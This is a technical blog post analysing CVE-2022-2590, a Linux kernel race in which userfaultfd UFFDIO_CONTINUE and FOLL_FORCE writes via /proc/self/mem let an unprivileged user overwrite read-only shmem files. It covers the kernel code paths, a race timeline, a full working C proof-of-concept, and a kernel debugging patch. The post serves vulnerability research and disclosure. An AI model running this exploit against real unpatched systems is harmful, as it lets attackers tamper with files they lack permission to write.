
[Linux kernel] CVE-2022-2590, a Dirty COW restricted to shared memory

deayzl 2024. 7. 31. 00:35

An English version of this document is available at https://github.com/hyeonjun17/CVE-2022-2590-analysis

 


 

 

Analyzed and tested on: Linux/x86 6.0.0-rc1 (commit 37887783b3fef877bf34b8992c9199864da4afcb)

Introduction:

This vulnerability allows arbitrary content to be written to read-only shared memory pages by using UFFDIO_CONTINUE to satisfy all three conditions checked in can_follow_write_pte: FOLL_FORCE, FOLL_COW, and pte_dirty.

 

Analysis:

/*
 * FOLL_FORCE can write to even unwritable pte's, but only
 * after we've gone through a COW cycle and they are dirty.
 */
static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
{
	return pte_write(pte) ||
		((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}

The function above decides, while looking up the pte that a write will target, whether that pte may be written to.

It treats the pte as writable if either of the following conditions holds.

 

1. The pte's flags mark it as writable.

2. The flags argument contains both FOLL_FORCE and FOLL_COW, and the pte's flags mark it as dirty.

 

The three flags needed to satisfy condition 2 can be set as follows.

 

1. FOLL_FORCE

static ssize_t mem_rw(struct file *file, char __user *buf,
			size_t count, loff_t *ppos, int write)
{
	...

	flags = FOLL_FORCE | (write ? FOLL_WRITE : 0);

	while (count > 0) {
		size_t this_len = min_t(size_t, count, PAGE_SIZE);

		if (write && copy_from_user(page, buf, this_len)) {
			copied = -EFAULT;
			break;
		}

		this_len = access_remote_vm(mm, addr, page, this_len, flags); // __get_user_pages with FOLL_FORCE on
		if (!this_len) {
			if (!copied)
				copied = -EIO;
			break;
		}

		...
}

The function above handles reads and writes on /proc/<pid>/mem.

Performing a write through this function reaches __get_user_pages with the FOLL_FORCE flag set.
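
For illustration, here is a minimal userspace sketch of that path, condensed from the PoC later in this post (the helper name force_write is only for illustration; error handling is omitted). Writing through /proc/self/mem targets the caller's own address space, and the kernel performs the write with FOLL_FORCE even though the mapping being written is read-only:

#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

/* Write `data` over `target` in our own address space via /proc/self/mem.
 * In the kernel this goes mem_rw() -> access_remote_vm() with
 * FOLL_FORCE | FOLL_WRITE, so the PROT_READ-only protection of the
 * mapping containing `target` is not what decides whether it succeeds. */
static void force_write(void *target, const char *data)
{
	int mem_fd = open("/proc/self/mem", O_RDWR);

	pwrite(mem_fd, data, strlen(data), (uintptr_t)target);
	close(mem_fd);
}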

FOLL_FORCE was originally a flag used by ptrace, but the following commit shows why it is still needed for /proc/<pid>/mem.

https://github.com/torvalds/linux/commit/f511c0b17b081562dca8ac5061dfa86db4c66cc2 ("Yes, people use FOLL_FORCE ;)")

 

"Yes, people use FOLL_FORCE ;)" · torvalds/linux@f511c0b

This effectively reverts commit 8ee74a91ac30 ("proc: try to remove use of FOLL_FORCE entirely") It turns out that people do depend on FOLL_FORCE for the /proc/<pid>/mem case, and w...

github.com

 

2. FOLL_COW

/*
 * mmap_lock must be held on entry.  If @locked != NULL and *@flags
 * does not include FOLL_NOWAIT, the mmap_lock may be released.  If it
 * is, *@locked will be set to 0 and -EBUSY returned.
 */
static int faultin_page(struct vm_area_struct *vma,
		unsigned long address, unsigned int *flags, bool unshare,
		int *locked)
{
	...

	/*
	 * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
	 * necessary, even if maybe_mkwrite decided not to set pte_write. We
	 * can thus safely do subsequent page lookups as if they were reads.
	 * But only do so when looping for pte_write is futile: in some cases
	 * userspace may also be wanting to write to the gotten user page,
	 * which a read fault here might prevent (a readonly page might get
	 * reCOWed by userspace write).
	 */
	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
		*flags |= FOLL_COW;
	return 0;
}

This abuses the FOLL_COW OR-assignment in faultin_page, which is part of the original Dirty COW patch.

static long __get_user_pages(struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas, int *locked)
{
	...
retry:
		/*
		 * If we have a pending SIGKILL, don't keep faulting pages and
		 * potentially allocating memory.
		 */
		if (fatal_signal_pending(current)) {
			ret = -EINTR;
			goto out;
		}
		cond_resched();

		page = follow_page_mask(vma, start, foll_flags, &ctx); // can_follow_write_pte
		if (!page || PTR_ERR(page) == -EMLINK) {
			ret = faultin_page(vma, start, &foll_flags,
					   PTR_ERR(page) == -EMLINK, locked); // flags |= FOLL_COW
			switch (ret) {
			case 0:
				goto retry; // try follow page again
			case -EBUSY:
			case -EAGAIN:
				ret = 0;
				fallthrough;
			case -EFAULT:
			case -ENOMEM:
			case -EHWPOISON:
				goto out;
			}
			BUG();
		} else if (PTR_ERR(page) == -EEXIST) {
        ...
}

 

Inside __get_user_pages, faultin_page must be called and execution must loop back to the retry label so that can_follow_write_pte is reached with the FOLL_COW flag set.
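
From userspace, the only requirement for that branch is that the target VMA has no VM_WRITE, which is exactly how the PoC below maps the target file (a one-line excerpt; fd is the read-only descriptor of the target file):

/* Read-only, private mapping of the target shmem file: the vma lacks VM_WRITE,
 * so when the forced write fault breaks COW and returns VM_FAULT_WRITE,
 * faultin_page() sets FOLL_COW and __get_user_pages() jumps back to retry. */
void *map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);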

 

3. pte_dirty

This condition can be satisfied thanks to the following commit.

https://github.com/torvalds/linux/commit/9ae0f87d009ca6c4aab2882641ddfc319727e3db ("mm/shmem: unconditionally set pte dirty in mfill_atomic_install_pte")

 


/*
 * Install PTEs, to map dst_addr (within dst_vma) to page.
 *
 * This function handles both MCOPY_ATOMIC_NORMAL and _CONTINUE for both shmem
 * and anon, and for both shared and private VMAs.
 */
int mfill_atomic_install_pte(struct mm_struct *dst_mm, pmd_t *dst_pmd,
			     struct vm_area_struct *dst_vma,
			     unsigned long dst_addr, struct page *page,
			     bool newly_allocated, bool wp_copy)
{
	...

	_dst_pte = mk_pte(page, dst_vma->vm_page_prot);
	_dst_pte = pte_mkdirty(_dst_pte); // set pte dirty unconditionally
	if (page_in_cache && !vm_shared)
		writable = false;

	...
}

 

Thanks to this patch, a pte for a read-only shared memory page can be installed unconditionally in the dirty state.
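
Condensed from the PoC below, the userspace sequence that drives the kernel into mfill_atomic_install_pte and installs such a dirty (but still read-only) pte looks roughly like this; error handling and the loop that reads fault events from the uffd descriptor are omitted:

/* Register the read-only shmem mapping in userfaultfd minor mode. */
int uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK | UFFD_USER_MODE_ONLY);

struct uffdio_api api = { .api = UFFD_API, .features = UFFD_FEATURE_MINOR_SHMEM };
ioctl(uffd, UFFDIO_API, &api);

struct uffdio_register reg = {
	.range = { .start = (unsigned long) map, .len = 4096 },
	.mode  = UFFDIO_REGISTER_MODE_MINOR,
};
ioctl(uffd, UFFDIO_REGISTER, &reg);

/* Later, once a minor fault on `map` has been read from uffd:
 * UFFDIO_CONTINUE -> mcontinue_atomic_pte() -> mfill_atomic_install_pte(),
 * which installs the page-cache page with pte_mkdirty() applied. */
struct uffdio_continue cont = {
	.range = { .start = (unsigned long) map, .len = 4096 },
	.mode  = 0,
};
ioctl(uffd, UFFDIO_CONTINUE, &cont);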

 

 

Once all three of these conditions are satisfied, can_follow_write_pte returns true, and

static struct page *follow_page_pte(struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd, unsigned int flags,
		struct dev_pagemap **pgmap)
{
	...
    
	// FOLL_WRITE is set and can_follow_write_pte() now returns true, so !true == false and we do not bail out
	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
		pte_unmap_unlock(ptep, ptl);
		return NULL;
	}

	page = vm_normal_page(vma, address, pte); // get read-only shared memory page

	...

out:
	pte_unmap_unlock(ptep, ptl);
	return page;
no_page:
	pte_unmap_unlock(ptep, ptl);
	if (!pte_none(pte))
		return NULL;
	return no_page_table(vma, flags);
}

 

the read-only shared memory page can be obtained.

 

Race Scenario:

The following is the race scenario, as demonstrated by the PoC covered below.

 

(three threads: madvise+read, uffd = the UFFDIO_CONTINUE ioctl handler, pwrite; time flows top to bottom)

[madvise+read]  madvise                                                // zap the page
[madvise+read]  shmem_fault                                            // read fault
[madvise+read]  handle_userfault
[uffd]          userfaultfd_continue                                   // UFFDIO_CONTINUE ioctl
[uffd]          mcontinue_atomic_pte
[uffd]          ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC); // get page
[uffd]          mfill_atomic_install_pte
[uffd]          _dst_pte = pte_mkdirty(_dst_pte);                      // make pte dirty
[uffd]          set_pte_at(dst_mm, dst_addr, dst_pte, _dst_pte);       // install pte
[pwrite]        mem_rw
[pwrite]        access_remote_vm                                       // with FOLL_FORCE
[pwrite]        __get_user_pages
[pwrite]        can_follow_write_pte                                   // no FOLL_COW, returns 0
[pwrite]        faultin_page
[pwrite]        flags |= FOLL_COW
[pwrite]        retry:
[madvise+read]  madvise                                                // zap the page (2nd time)
[pwrite]        follow_page_pte                                        // concurrently with the 2nd madvise+read
[madvise+read]  shmem_fault                                            // read fault
[madvise+read]  handle_userfault
[uffd]          userfaultfd_continue
[uffd]          mcontinue_atomic_pte
[uffd]          ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC); // get page
[uffd]          mfill_atomic_install_pte
[uffd]          _dst_pte = pte_mkdirty(_dst_pte);                      // make pte dirty
[pwrite]        can_follow_write_pte                                   // returns 1
[pwrite]        copy_to_user(buf, page, this_len)                      // write content to read-only page

 

The madvise-and-read routine runs twice: the first run induces the retry in __get_user_pages, and the second run makes the retried lookup land on the pte that was just installed as dirty.
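
For reference, this is how the PoC's main() (listed in full below) orders those two runs:

pthread_create(&thread1, NULL, uffd_thread_fn, NULL);  /* uffd thread: answers minor faults with UFFDIO_CONTINUE */
madvise(map, 4096, MADV_DONTNEED);                     /* 1st zap */
tmp = *((int *)map);                                   /* read fault -> dirty pte installed */
pthread_create(&thread2, NULL, write_thread_fn, NULL); /* pwrite: fails once, gets FOLL_COW, retries */
usleep(300 * 1000);
madvise(map, 4096, MADV_DONTNEED);                     /* 2nd zap */
tmp = *((int *)map);                                   /* read fault -> dirty pte installed again;
                                                          the retried lookup now passes can_follow_write_pte */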

 

PoC and Patch:

https://www.openwall.com/lists/oss-security/2022/08/15/1 (oss-security: "Re: CVE-2022-2590: Linux kernel: Modifying shmem/tmpfs files without write permissions")

 


David Hildenbrand's reproducer can be found at the link above.

However, that reproducer makes it hard to hit the exact race scenario, so I modified it to favor as linear an execution as possible and patched the Linux kernel source accordingly. Each PoC thread names itself with prctl(PR_SET_NAME) so that the kernel-side instrumentation can key its printk() output and induced delays on current->comm.

 

.config:

...
CONFIG_USERFAULTFD=y
CONFIG_HAVE_ARCH_USERFAULTFD_WP=y
CONFIG_HAVE_ARCH_USERFAULTFD_MINOR=y
...

 

PoC:

/*
 *
 * modified reproducer by deayzl (originally from David Hildenbrand <david@redhat.com>)
 *
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <linux/prctl.h>
#include <sys/prctl.h>

#define UFFD_FEATURE_MINOR_SHMEM		(1<<10)

#define UFFDIO_REGISTER_MODE_MINOR	((__u64)1<<2)

#define UFFD_USER_MODE_ONLY 1

#define _UFFDIO_CONTINUE		(0x07)

#define UFFDIO_CONTINUE		_IOWR(UFFDIO, _UFFDIO_CONTINUE,	\
				      struct uffdio_continue)

struct uffdio_continue {
	struct uffdio_range range;
#define UFFDIO_CONTINUE_MODE_DONTWAKE		((__u64)1<<0)
	__u64 mode;

	/*
	 * Fields below here are written by the ioctl and must be at the end:
	 * the copy_from_user will not read past here.
	 */
	__s64 mapped;
};

int mem_fd;
void *map;
int uffd;

char str[] = "AAAA";

void *write_thread_fn(void *arg)
{
	prctl(PR_SET_NAME, "pwrite");
	pwrite(mem_fd, str, strlen(str), (uintptr_t) map);
	return NULL;
}

static void *uffd_thread_fn(void *arg)
{
	static struct uffd_msg msg;   /* Data read from userfaultfd */
	struct uffdio_continue uffdio;
	struct uffdio_range uffdio_wake;
	ssize_t nread;
	prctl(PR_SET_NAME, "uffd");

	while (1) {
		struct pollfd pollfd;
		int nready;

		pollfd.fd = uffd;
		pollfd.events = POLLIN;
		nready = poll(&pollfd, 1, -1);
		if (nready == -1) {
			fprintf(stderr, "poll() failed: %d\n", errno);
			exit(1);
		}

		nread = read(uffd, &msg, sizeof(msg));
		if (nread <= 0)
			continue;

		uffdio.range.start = (unsigned long) map;
		uffdio.range.len = 4096;
		uffdio.mode = 0;
		if (ioctl(uffd, UFFDIO_CONTINUE, &uffdio) < 0) {
			if (errno == EEXIST) {
				uffdio_wake.start = (unsigned long) map;
				uffdio_wake.len = 4096;
				if (ioctl(uffd, UFFDIO_WAKE, &uffdio_wake) < 0) {

				}
			} else {
				fprintf(stderr, "UFFDIO_CONTINUE failed: %d\n", errno);
			}
		}
	}
}

static int setup_uffd(void)
{
	struct uffdio_api uffdio_api;
	struct uffdio_register uffdio_register;

	uffd = syscall(__NR_userfaultfd,
		       O_CLOEXEC | O_NONBLOCK | UFFD_USER_MODE_ONLY);
	if (uffd < 0) {
		fprintf(stderr, "syscall(__NR_userfaultfd) failed: %d\n", errno);
		return -errno;
	}

	uffdio_api.api = UFFD_API;
	uffdio_api.features = UFFD_FEATURE_MINOR_SHMEM;
	if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
		fprintf(stderr, "UFFDIO_API failed: %d\n", errno);
		return -errno;
	}

	if (!(uffdio_api.features & UFFD_FEATURE_MINOR_SHMEM)) {
		fprintf(stderr, "UFFD_FEATURE_MINOR_SHMEM missing\n");
		return -ENOSYS;
	}

	uffdio_register.range.start = (unsigned long) map;
	uffdio_register.range.len = 4096;
	uffdio_register.mode = UFFDIO_REGISTER_MODE_MINOR;
	if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
		fprintf(stderr, "UFFDIO_REGISTER failed: %d\n", errno);
		return -errno;
	}

	return 0;
}

static void print_content(int fd)
{
	ssize_t ret;
	char buf[80];
	int offs = 0;

	while (1) {
		ret = pread(fd, buf, sizeof(buf) - 1, offs);
		if (ret > 0) {
			buf[ret] = 0;
			printf("%s", buf);
			offs += ret;
		} else if (!ret) {
			break;
		} else {
			fprintf(stderr, "pread() failed: %d\n", errno);
			break;
		}
	}
	printf("\n");
}

int main(int argc, char *argv[])
{
	pthread_t thread1, thread2;
	int fd;

	if (argc == 2) {
		fd = open(argv[1], O_RDONLY);
		if (fd < 0) {
			fprintf(stderr, "open() failed: %d\n", errno);
			return 1;
		}
	} else {
		fprintf(stderr, "usage: %s target_file\n", argv[0]);
		return 1;
	}

	mem_fd = open("/proc/self/mem", O_RDWR);
	if (mem_fd < 0) {
		fprintf(stderr, "open(/proc/self/mem) failed: %d\n", errno);
		return 1;
	}

	map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
	if (map == MAP_FAILED) {
		fprintf(stderr, "mmap() failed: %d\n", errno);
		return 1;
	}

	if (setup_uffd())
		return 1;

	printf("Old content: \n");
	print_content(fd);

	int ret;
	int tmp;
	pthread_create(&thread1, NULL, uffd_thread_fn, NULL);
	prctl(PR_SET_NAME, "madvise");
	ret = madvise(map, 4096, MADV_DONTNEED);
	if (ret < 0) {
		fprintf(stderr, "madvise() failed: %d\n", errno);
		exit(1);
	}
	tmp = *((int *)map);
	pthread_create(&thread2, NULL, write_thread_fn, NULL);
	usleep(300 * 1000); /* ~0.3 s: give the pwrite thread time to set FOLL_COW and reach follow_page_pte */
	prctl(PR_SET_NAME, "madvise");
	ret = madvise(map, 4096, MADV_DONTNEED);
	if (ret < 0) {
		fprintf(stderr, "madvise() failed: %d\n", errno);
		exit(1);
	}
	tmp = *((int *)map);
	sleep(5);

	printf("New content: \n");
	print_content(fd);

	return 0;
}

 

Patch:

diff --git a/Makefile b/Makefile
index f09673b6c11d..cd952e1b49f0 100644
--- a/Makefile
+++ b/Makefile
@@ -789,7 +789,8 @@ stackp-flags-$(CONFIG_STACKPROTECTOR_STRONG)      := -fstack-protector-strong
 KBUILD_CFLAGS += $(stackp-flags-y)
 
 KBUILD_CFLAGS-$(CONFIG_WERROR) += -Werror
-KBUILD_CFLAGS-$(CONFIG_CC_NO_ARRAY_BOUNDS) += -Wno-array-bounds
+# KBUILD_CFLAGS-$(CONFIG_CC_NO_ARRAY_BOUNDS) += -Wno-array-bounds
+KBUILD_CFLAGS += -Wno-array-bounds -Wno-format
 KBUILD_CFLAGS += $(KBUILD_CFLAGS-y) $(CONFIG_CC_IMPLICIT_FALLTHROUGH)
 
 ifdef CONFIG_CC_IS_CLANG
diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
index 1c44bf75f916..004f7c391903 100644
--- a/fs/userfaultfd.c
+++ b/fs/userfaultfd.c
@@ -1450,7 +1450,7 @@ static int userfaultfd_register(struct userfaultfd_ctx *ctx,
 		 * the current one has not been updated yet.
 		 */
 		vma->vm_flags = new_flags;
-		vma->vm_userfaultfd_ctx.ctx = ctx;
+		vma->vm_userfaultfd_ctx.ctx = ctx;if((new_flags&VM_UFFD_MINOR)!=0){printk(KERN_ALERT "[userfaultfd_register] uffd registered at vma: 0x%lx as UFFDIO_REGISTER_MODE_MINOR (ctx: 0x%lx)\n", (unsigned long)vma, (unsigned long)ctx);}
 
 		if (is_vm_hugetlb_page(vma) && uffd_disable_huge_pmd_share(vma))
 			hugetlb_unshare_all_pmds(vma);
diff --git a/mm/gup.c b/mm/gup.c
index 732825157430..1f3a4a0c67b3 100644
--- a/mm/gup.c
+++ b/mm/gup.c
@@ -483,11 +483,11 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
  * after we've gone through a COW cycle and they are dirty.
  */
 static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
-{
+{if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[can_follow_write_pte/%s] res: %d(%d && %d && %d) (pte=0x%lx)\n", current->comm, pte_write(pte) || ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte)), flags & FOLL_FORCE, flags & FOLL_COW, pte_dirty(pte), pte_val(pte));}
 	return pte_write(pte) ||
 		((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
 }
-
+bool do_ssleep=false;
 static struct page *follow_page_pte(struct vm_area_struct *vma,
 		unsigned long address, pmd_t *pmd, unsigned int flags,
 		struct dev_pagemap **pgmap)
@@ -505,7 +505,7 @@ static struct page *follow_page_pte(struct vm_area_struct *vma,
 retry:
 	if (unlikely(pmd_bad(*pmd)))
 		return no_page_table(vma, flags);
-
+	if(do_ssleep && !strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[follow_page_pte/%s] before ssleep 1\n", current->comm);schedule_timeout_interruptible(3 * HZ);printk(KERN_ALERT "[follow_page_pte/%s] after ssleep 1\n", current->comm);do_ssleep=false;}
 	ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
 	pte = *ptep;
 	if (!pte_present(pte)) {
@@ -995,6 +995,7 @@ static int faultin_page(struct vm_area_struct *vma,
 	 * which a read fault here might prevent (a readonly page might get
 	 * reCOWed by userspace write).
 	 */
+	if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[faultin_page/%s] if %d && %d, set flags FOLL_COW\n", current->comm, (ret & VM_FAULT_WRITE), !(vma->vm_flags & VM_WRITE));do_ssleep=true;}
 	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
 		*flags |= FOLL_COW;
 	return 0;
@@ -1190,10 +1191,10 @@ static long __get_user_pages(struct mm_struct *mm,
 		}
 		cond_resched();
 
-		page = follow_page_mask(vma, start, foll_flags, &ctx);
+		page = follow_page_mask(vma, start, foll_flags, &ctx);if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[__get_user_pages/%s] page: 0x%lx\n", current->comm, (unsigned long)page);}
 		if (!page || PTR_ERR(page) == -EMLINK) {
 			ret = faultin_page(vma, start, &foll_flags,
-					   PTR_ERR(page) == -EMLINK, locked);
+					   PTR_ERR(page) == -EMLINK, locked);if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[__get_user_pages/%s] faultin_page returns %d\n", current->comm, ret);}
 			switch (ret) {
 			case 0:
 				goto retry;
diff --git a/mm/memory.c b/mm/memory.c
index 4ba73f5aa8bb..de3ffc8ff3ab 100644
--- a/mm/memory.c
+++ b/mm/memory.c
@@ -4654,7 +4654,7 @@ static vm_fault_t do_fault(struct vm_fault *vmf)
 	if (vmf->prealloc_pte) {
 		pte_free(vm_mm, vmf->prealloc_pte);
 		vmf->prealloc_pte = NULL;
-	}
+	}if(!strcmp(current->comm, "madvise")){unsigned long tmp = vmf->pte != 0 ? pte_val(*vmf->pte) : 0;printk(KERN_ALERT "[do_fault/%s] after do_read_fault, vmf->pte: 0x%lx\n", current->comm, tmp);}
 	return ret;
 }
 
diff --git a/mm/shmem.c b/mm/shmem.c
index 5783f11351bb..370333c7fb13 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -1554,7 +1554,7 @@ static struct folio *shmem_alloc_folio(gfp_t gfp,
 	struct folio *folio;
 
 	shmem_pseudo_vma_init(&pvma, info, index);
-	folio = vma_alloc_folio(gfp, 0, &pvma, 0, false);
+	folio = vma_alloc_folio(gfp, 0, &pvma, 0, false);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[shmem_alloc_folio/%s] vma_alloc_folio returns folio: 0x%lx\n", current->comm, (unsigned long)folio);}
 	shmem_pseudo_vma_destroy(&pvma);
 
 	return folio;
@@ -1855,13 +1855,13 @@ static int shmem_getpage_gfp(struct inode *inode, pgoff_t index,
 	sbinfo = SHMEM_SB(inode->i_sb);
 	charge_mm = vma ? vma->vm_mm : NULL;
 
-	folio = __filemap_get_folio(mapping, index, FGP_ENTRY | FGP_LOCK, 0);
+	folio = __filemap_get_folio(mapping, index, FGP_ENTRY | FGP_LOCK, 0);//if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] __filemap_get_folio returns folio: 0x%lx\n", current->comm, (unsigned long)folio);}
 	if (folio && vma && userfaultfd_minor(vma)) {
 		if (!xa_is_value(folio)) {
 			folio_unlock(folio);
 			folio_put(folio);
-		}
-		*fault_type = handle_userfault(vmf, VM_UFFD_MINOR);
+		}if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] handle_userfault starts\n", current->comm);}
+		*fault_type = handle_userfault(vmf, VM_UFFD_MINOR);if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] handle_userfault ends\n", current->comm);}
 		return 0;
 	}
 
@@ -2013,7 +2013,7 @@ static int shmem_getpage_gfp(struct inode *inode, pgoff_t index,
 		goto unlock;
 	}
 out:
-	*pagep = folio_page(folio, index - hindex);
+	*pagep = folio_page(folio, index - hindex);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] folio_page returns page: 0x%lx\n", current->comm, (unsigned long)*pagep);}
 	return 0;
 
 	/*
@@ -2123,7 +2123,7 @@ static vm_fault_t shmem_fault(struct vm_fault *vmf)
 	}
 
 	err = shmem_getpage_gfp(inode, vmf->pgoff, &vmf->page, SGP_CACHE,
-				  gfp, vma, vmf, &ret);
+				  gfp, vma, vmf, &ret);if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_fault/%s] shmem_getpage_gfp(page=0x%lx) returns %d\n", current->comm, (unsigned long)vmf->page, err);}
 	if (err)
 		return vmf_error(err);
 	return ret;
diff --git a/mm/userfaultfd.c b/mm/userfaultfd.c
index 07d3befc80e4..29acbe56bf2c 100644
--- a/mm/userfaultfd.c
+++ b/mm/userfaultfd.c
@@ -70,7 +70,7 @@ int mfill_atomic_install_pte(struct mm_struct *dst_mm, pmd_t *dst_pmd,
 	pgoff_t offset, max_off;
 
 	_dst_pte = mk_pte(page, dst_vma->vm_page_prot);
-	_dst_pte = pte_mkdirty(_dst_pte);
+	_dst_pte = pte_mkdirty(_dst_pte);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[mfill_atomic_install_pte/%s] pte_mkdirty(page=0x%lx) (pte: 0x%lx)\n", current->comm, (unsigned long)page, pte_val(_dst_pte));}
 	if (page_in_cache && !vm_shared)
 		writable = false;
 
@@ -246,7 +246,7 @@ static int mcontinue_atomic_pte(struct mm_struct *dst_mm,
 	struct page *page;
 	int ret;
 
-	ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC);
+	ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[mcontinue_atomic_pte/%s] shmem_getpage returns page: 0x%lx\n", current->comm, (unsigned long)page);}
 	/* Our caller expects us to return -EFAULT if we failed to find page. */
 	if (ret == -ENOENT)
 		ret = -EFAULT;

 

 

For the test, perform the following preparation first.

(David's reproducer uses /tmp/foo, but in this environment /tmp is not a tmpfs/shared-memory mount, so userfaultfd registration fails there; /dev/shm/foo is used instead.)

sudo -s
echo "asdf" > /dev/shm/foo
chmod 0404 /dev/shm/foo
exit

 

Running the PoC afterwards shows the old and new contents of the target file, confirming that the read-only file has been modified.

 

 

 

References:

commit: https://github.com/torvalds/linux/commit/5535be3099717646781ce1540cf725965d680e7b ("mm/gup: fix FOLL_FORCE COW security issue and remove FOLL_COW")

lore.kernel patch v1: https://lore.kernel.org/linux-mm/20220808073232.8808-1-david@redhat.com/#r ("[PATCH v1] mm/gup: fix FOLL_FORCE COW security issue and remove FOLL_COW")

lore.kernel patch v2: https://lore.kernel.org/all/20220809205640.70916-1-david@redhat.com/T/#u ("[PATCH v2] mm/gup: fix FOLL_FORCE COW security issue and remove FOLL_COW")

openwall: https://www.openwall.com/lists/oss-security/2022/08/08/1 ("CVE-2022-2590: Linux kernel: Modifying shmem/tmpfs files without write permissions")

openwall2: https://lists.openwall.net/linux-kernel/2022/08/08/418 ("[PATCH v1] mm/gup: fix FOLL_FORCE COW security issue and remove FOLL_COW")

 
